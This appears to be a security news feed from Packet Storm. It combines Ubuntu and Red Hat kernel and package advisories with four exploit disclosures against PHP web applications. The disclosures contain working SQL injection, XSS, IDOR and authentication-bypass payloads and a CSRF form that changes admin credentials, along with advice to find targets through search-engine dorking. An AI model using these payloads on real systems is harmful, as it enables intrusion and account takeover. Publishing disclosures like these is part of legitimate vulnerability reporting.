Ubuntu Security Notice 6926-2 - 黄思聪 discovered that the NFC Controller Interface implementation in the Linux kernel did not properly handle certain memory allocation failure conditions, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service. It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel when modifying certain settings values through debugfs. A privileged local attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6926-2August 01, 2024linux-azure, linux-azure-4.15 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 14.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems- linux-azure: Linux kernel for Microsoft Azure Cloud systemsDetails:黄思聪 discovered that the NFC Controller Interface (NCI) implementation inthe Linux kernel did not properly handle certain memory allocation failureconditions, leading to a null pointer dereference vulnerability. A localattacker could use this to cause a denial of service (system crash).(CVE-2023-46343)It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel when modifying certain settings values through debugfs.A privileged local attacker could use this to cause a denial of service.(CVE-2024-24857, CVE-2024-24858, CVE-2024-24859)Chenyuan Yang discovered that the Unsorted Block Images (UBI) flash devicevolume management subsystem did not properly validate logical eraseblocksizes in certain situations. An attacker could possibly use this to cause adenial of service (system crash). (CVE-2024-25739)Supraja Sridhara, Benedict Schlüter, Mark Kuhne, Andrin Bertschi, andShweta Shinde discovered that the Confidential Computing framework in theLinux kernel for x86 platforms did not properly handle 32-bit emulation onTDX and SEV. An attacker with access to the VMM could use this to cause adenial of service (guest crash) or possibly execute arbitrary code.(CVE-2024-25744)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - HID subsystem;  - I2C subsystem;  - MTD block device drivers;  - Network drivers;  - TTY drivers;  - USB subsystem;  - File systems infrastructure;  - F2FS file system;  - SMB network file system;  - BPF subsystem;  - B.A.T.M.A.N. meshing protocol;  - Bluetooth subsystem;  - Networking core;  - IPv4 networking;  - IPv6 networking;  - Netfilter;  - Unix domain sockets;  - AppArmor security module;(CVE-2024-26884, CVE-2024-26882, CVE-2024-26923, CVE-2024-26840,CVE-2023-52435, CVE-2024-35984, CVE-2024-26886, CVE-2023-52752,CVE-2023-52436, CVE-2024-36016, CVE-2024-26857, CVE-2024-36902,CVE-2023-52443, CVE-2024-35997, CVE-2024-35982, CVE-2023-52469,CVE-2024-27020, CVE-2024-35978, CVE-2024-26934, CVE-2024-27013,CVE-2023-52449, CVE-2024-26901, CVE-2023-52444, CVE-2023-52620)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  linux-image-4.15.0-1179-azure   4.15.0-1179.194                                  Available with Ubuntu Pro  linux-image-azure-lts-18.04     4.15.0.1179.147                                  Available with Ubuntu ProUbuntu 14.04 LTS  linux-image-4.15.0-1179-azure   4.15.0-1179.194~14.04.1                                  Available with Ubuntu Pro  linux-image-azure               4.15.0.1179.194~14.04.1                                  Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-6926-2  https://ubuntu.com/security/notices/USN-6926-1  CVE-2023-46343, CVE-2023-52435, CVE-2023-52436, CVE-2023-52443,  CVE-2023-52444, CVE-2023-52449, CVE-2023-52469, CVE-2023-52620,  CVE-2023-52752, CVE-2024-24857, CVE-2024-24858, CVE-2024-24859,  CVE-2024-25739, CVE-2024-25744, CVE-2024-26840, CVE-2024-26857,  CVE-2024-26882, CVE-2024-26884, CVE-2024-26886, CVE-2024-26901,  CVE-2024-26923, CVE-2024-26934, CVE-2024-27013, CVE-2024-27020,  CVE-2024-35978, CVE-2024-35982, CVE-2024-35984, CVE-2024-35997,  CVE-2024-36016, CVE-2024-36902

Ubuntu Security Notice USN-6926-2

Readymade Unilevel Ecommerce MLM suffers from remote blind SQL injection and cross site scripting vulnerabilities. These issues affected the version released as late as March 15, 2024.

    [x]========================================================================================================================================[x] | Title        : Readymade Unilevel Ecommerce MLM Blind SQL & XSS Vulnerabilities | Software     : Readymade Unilevel Ecommerce | Last Update  : 15/03/24 [TESTED VERSION SCRIPT] | First Release: 16/11/21 | Vendor       : http://www.i-netsolution.com/ | Date         : 01 Agustus 2024 | Author       : OoN_Boy[x]========================================================================================================================================[x] | Technology       : PHP | Database         : MySQL | Price            : $500 | Description      : MLM Unilevel Plan Script developed by experts and professionals. Rather than building your business from the scratch, make use of our Unilevel MLM PHP Script to launch your MLM business.[x]========================================================================================================================================[x][O] Exploit    http://localhost/eommlm/product-details.php?id=11[SQL]  http://localhost/ecomlm/product-details.php?id=11[XSS]  [O] Proof of concept    sqlmap.py -u "http://localhost/eommlm/product-details.php?id=11" --invalid-string    [SQL]  Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: id=11 AND 1189=1189    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: id=11;SELECT SLEEP(10)#    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL)    [XSS]    http://localhost/ecomlm/product-details.php?id=11"><img/src/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY>    [x]========================================================================================================================================[x][O] GreetzBatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^[x]========================================================================================================================================[x]

ReadyMade Unilevel Ecommerce MLM Blind SQL Injection / Cross Site Scripting

Appointment Scheduler version 3.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Appointment Scheduler v3.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport[+] http://127.0.0.1/www/ wongkit.com.hk/appointment/index.php?controller=pjAdminBookings&action=pjActionExportGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Appointment Scheduler 3.0 Insecure Direct Object Reference

AccPack Cop version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : AccPack Cop v1.0 CSRF Vulnerability                                                                                         |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |  
| # Vendor    : http://webpay.com.np/#Product                                                                                               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following HTML code modifies the admin information.

[+] Go to the line 5. Set the target site link Save changes and apply . 

[+] infected file : cms/user/modify.php.

[+] http://127.0.0.1/q7.3/cms/user/modify.php.

[+] save code as poc.html 

[+] payload : 

</head>  
<body>  
  <div class="container">  
    <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div>  
    <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST"  enctype="multipart/form-data">  
      <div hidden="true">  
        <input type="text" name="id" id="id" value="1">  
      </div>  
       <div>  
        <label for='email'>Email</label><input  type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz">  
       </div>  
       <div>  
        <label for='password'>Password</label><input  type="text" class="form-control" name='password' id='password' type='password' value="123456">  
       </div>  
       <tr>  
       <div>  
        <label for='status'>Status</label>  
          <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>  
          <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>

               </div>     
       <div style='height:80'>  
        <input type='submit' value='Submit'><input type='reset' Value='Reset'>  
       </div>  
    </form>  
  </div>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

AccPack Cop 1.0 Cross Site Request Forgery

AccPack Buzz version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : AccPack Buzz v1.0 Auth By Pass Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AccPack Buzz 1.0 SQL Injection

Red Hat Security Advisory 2024-4982-03 - OpenShift API for Data Protection 1.3.3 is now available. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4982.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift API for Data Protection (OADP) 1.3.3 security and bug fix update  
Advisory ID:        RHSA-2024:4982-03  
Product:            OpenShift API for Data Protection  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:4982  
Issue date:         2024-08-02  
Revision:           03  
CVE Names:          CVE-2023-45288  
====================================================================

Summary: 

OpenShift API for Data Protection (OADP) 1.3.3 is now available.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

OpenShift API for Data Protection (OADP) enables you to back up and restore application resources, persistent volume data, and internal container images to external backup storage. OADP enables both file system-based and snapshot-based backups for persistent volumes.

Security Fix(es) from Bugzilla:

* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames causes DoS (CVE-2023-45288)

* golang: net: malformed DNS message can cause infinite loop (CVE-2024-24788)

* golang: archive/zip: Incorrect handling of certain ZIP files (CVE-2024-24789)

* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses (CVE-2024-24790)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-45288

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2268273  
https://bugzilla.redhat.com/show_bug.cgi?id=2279814  
https://bugzilla.redhat.com/show_bug.cgi?id=2292668  
https://bugzilla.redhat.com/show_bug.cgi?id=2292787  
https://issues.redhat.com/browse/OADP-4110  
https://issues.redhat.com/browse/OADP-4211  
https://issues.redhat.com/browse/OADP-4265  
https://issues.redhat.com/browse/OADP-4268

Red Hat Security Advisory 2024-4982-03

Red Hat Security Advisory 2024-4972-03 - An update is now available for Red Hat OpenShift GitOps v1.11.7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4972.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Errata Advisory for Red Hat OpenShift GitOps v1.11.7 security updateAdvisory ID:        RHSA-2024:4972-03Product:            Red Hat OpenShift GitOpsAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4972Issue date:         2024-08-01Revision:           03CVE Names:          CVE-2023-40025====================================================================Summary: An update is now available for Red Hat OpenShift GitOps v1.11.7. Red HatProduct Security has rated this update as having a security impact of Important.A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Errata Advisory for Red Hat OpenShift GitOps v1.11.7.Security Fix(es):* openshift-gitops-argocd-container: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD [gitops-1.11](CVE-2024-40634)* openshift-gitops-container: Argo CD web terminal session doesn't expire [gitops-1.11](CVE-2023-40025)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-40025References:https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-4972-03

Red Hat Security Advisory 2024-4971-03 - An update for emacs is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4971.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: emacs security updateAdvisory ID:        RHSA-2024:4971-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4971Issue date:         2024-08-01Revision:           03CVE Names:          CVE-2024-39331====================================================================Summary: An update for emacs is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:GNU Emacs is a powerful, customizable, self-documenting text editor. It provides special code editing features, a scripting language (elisp), and the capability to read e-mail and news.Security Fix(es):* emacs: org-link-expand-abbrev: Do not evaluate arbitrary unsafe Elisp code (CVE-2024-39331)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-39331References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2293942

Red Hat Security Advisory 2024-4971-03

Red Hat Security Advisory 2024-4970-03 - An update for kpatch-patch-4_18_0-305_120_1 is now available for Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a privilege escalation vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4970.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch-4_18_0-305_120_1 security updateAdvisory ID:        RHSA-2024:4970-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4970Issue date:         2024-08-01Revision:           03CVE Names:          CVE-2023-6546====================================================================Summary: An update for kpatch-patch-4_18_0-305_120_1 is now available for Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which can be loaded by the kpatch command line utility to modify the code of a running kernel.  This patch module is targeted for kernel-4.18.0-305.120.1.el8_4.Security Fix(es):* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546,ZDI-CAN-20527)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-6546References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2255498

Red Hat Security Advisory 2024-4970-03

Red Hat Security Advisory 2024-4943-03 - An update for httpd is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4943.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: httpd security updateAdvisory ID:        RHSA-2024:4943-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4943Issue date:         2024-07-31Revision:           03CVE Names:          CVE-2024-38474====================================================================Summary: An update for httpd is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38474References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2295013https://bugzilla.redhat.com/show_bug.cgi?id=2295014https://bugzilla.redhat.com/show_bug.cgi?id=2295016

Tag

#vulnerability